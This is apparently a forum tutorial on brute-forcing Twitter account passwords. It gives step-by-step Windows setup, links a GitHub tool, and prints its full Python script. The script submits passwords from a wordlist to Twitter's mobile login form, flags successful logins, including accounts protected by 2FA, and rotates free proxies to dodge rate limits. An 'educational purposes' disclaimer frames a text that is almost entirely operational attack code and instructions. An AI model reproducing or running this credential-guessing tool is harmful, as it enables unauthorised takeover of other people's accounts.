Hacking Twitter Account [Bruteforce Method]

I am writing this guide since it was requested in this thread. This is for educational purposes and hopefully, people will learn from this to use a strong password for their account in the future.

This guide is meant to be written for Windows OS but you can also follow the steps to recreate the same technique for Linux as well.

Installing Python for Windows

The first step is to download the latest version of Python from the official website. As of writing this guide, the latest version for Windows 10 (64-bits) is 3.9.6 AMD64.

Screenshot 2021-08-04 182649.png

Make sure to select the option “Add Python 3.9 to PATH” when installing Python.

Screenshot 2021-08-04 183940.png

After successful installation, you should be able to access ‘python’ directly from the Windows command line.

Screenshot 2021-08-04 184535.png

Installing Required Tool for Bruteforce

Now that we have Python installed on our OS, we need the tool for brute-forcing the required Twitter account. I would recommend this tool: https://github.com/sadamshr3be/Hack-Twitter

You can download the files by clicking on the “Code” and then the “Download ZIP” button.

Screenshot 2021-08-04 191634.png

Extract the files from the ZIP archive into any folder.

Screenshot 2021-08-04 191915.png

Head over to command line and run the following command:

pip3 install mechanize

Screenshot 2021-08-04 192116.png

Once “mechanize” is installed, run the following command to install “proxylist”:

pip3 install proxylist

Screenshot 2021-08-04 193921.png

Lastly, you will be required to install “argparse”:

pip3 install argparse

Screenshot 2021-08-04 194355.png

Head over to the folder where you previously extracted the files from the ZIP archive using the command line.

Screenshot 2021-08-04 194629.png

Run the following command to test if everything is working fine:

python Hack-Twitter.py

Since this tool is meant for Linux and not for Windows, you will see weird codes when asked for inputs. This is not a bug but a compatibility issue.

Screenshot 2021-08-04 195246.png

To fix this, please copy and paste this entire code into the “Hack-Twitter.py” file:

import mechanize
import argparse
import sys
import os
from proxylist import ProxyList
import logging


print('''
    .'``.``.
 __/ (o) `, `.
'-=`,     ;   `.
    \    :      `-.
    /    ';        `.
   /      .'         `.
   |     (      `.     `-.._
    \     \` ` `. \         `-.._
     `.   ;`-.._ `-`._.-. `-._   `-._
       `..'     `-.```.  `-._ `-.._.'
         `--..__..-`--'      `-.,'
            `._)`/
             /--(
          -./,--'`-,
       ,^--(                    
       ,--' `-,         v1.2  
        **************************************
        * -> Development: sadamalsharabi          *
        * -> Telegram: https://t.me/termuxalsharabi *
        * -> Twitter: @sadamalsharabi              *
        **************************************
''')



b = mechanize.Browser()
b.set_handle_equiv(True)
b.set_handle_gzip(True)
b.set_handle_redirect(True)
b.set_handle_referer(True)
b.set_handle_robots(False)
b._factory.is_html = True

b.addheaders = [('User-agent',
                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/45.0.2454101'
                 )]

username = input('Username File: ')
passwordList = input('Password File: ')
proxyList = input('Proxy File: ')
def proxy():
    logging.basicConfig()
    pl = ProxyList()
    try:
        pl.load_file(proxyList)
    except:
        sys.exit('[!] Proxy File format has incorrect | EXIT...')
    pl.random()
    getProxy = pl.random().address()
    b.set_proxies(proxies={"https": getProxy})
    try:
        checkProxyIP = b.open("https://api.ipify.org/?format=raw", timeout=2)
    except:
        return proxy()
        
        
def Twitter():
    password = open(passwordList).read().splitlines()
    try_login = 0
    print("Target Account: {}".format(username))
    for password in password:
        try_login += 1
        if try_login == 10:
            try_login = 0
        sys.stdout.write('\r[-] {} [-] '.format(password))
        sys.stdout.flush()
        url = "https://mobile.twitter.com/login"
        try:
            response = b.open(url, timeout=2)
            b.select_form(nr=0)
            b.form['session[username_or_email]'] = username
            b.form['session[password]'] = password
            b.method = "POST"
            response = b.submit()

            if len(response.geturl()) == 27:
                print(f'\n [+] Good ^_^ [{username}]:[{password}] [+] ')
                proxy()
                break
            elif response.geturl() == "https://mobile.twitter.com/login/check":
                print(f'\n [+] Good ^_^ [{username}]:[{password}] [+] --> But There is a 2FA ')
                proxy()
            else:
                print(' NO ')
        except KeyboardInterrupt:
            print('\n ok exit ')
            sys.stdout.flush()
            proxy()
            break
            
if __name__ == '__main__':
    Twitter()
    proxy()

The next and final step is to fill in the inputs.

Screenshot 2021-08-04 200301.png

For the proxy, you can Google “Free proxies list” and you will find a ton of them. For example, you can get proxies from this website: https://free-proxy-list.net/